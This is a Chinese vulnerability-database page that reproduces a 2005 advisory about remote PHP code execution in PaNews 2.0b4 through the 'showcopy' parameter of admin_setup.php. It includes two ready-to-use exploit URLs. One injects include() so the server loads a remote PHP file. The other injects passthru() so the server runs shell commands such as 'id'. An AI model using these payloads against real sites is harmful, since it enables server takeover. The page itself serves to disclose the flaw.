PANews 2.0 – PHP Remote Code Execution

PANews 2.0 – PHP Remote Code Execution

漏洞ID 1054914 漏洞类型
发布时间 2005-02-21 更新时间 2005-02-21
图片[1]-PANews 2.0 – PHP Remote Code Execution-安全小百科CVE编号 N/A
图片[2]-PANews 2.0 – PHP Remote Code Execution-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25145
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12611/info

PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script.

Reports indicate that when malicious script code is injected, this code can then be forced to execute in the context of the web service that is hosting the affected software.

This vulnerability is reported to affect PaNews version 2.0b4, other versions might also be affected. 

Example 1

http://www.example.com/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://www.example.com/panews/includes/config.php?nst=http://your/file.php


Example 2

http://www.example.com/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://www.example.com/panews/includes/config.php?nst=id

相关推荐: MailEnable Professional Webmail Unspecified Vulnerability

MailEnable Professional Webmail Unspecified Vulnerability 漏洞ID 1097649 漏洞类型 Unknown 发布时间 2004-11-02 更新时间 2004-11-02 CVE编号 N/A CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享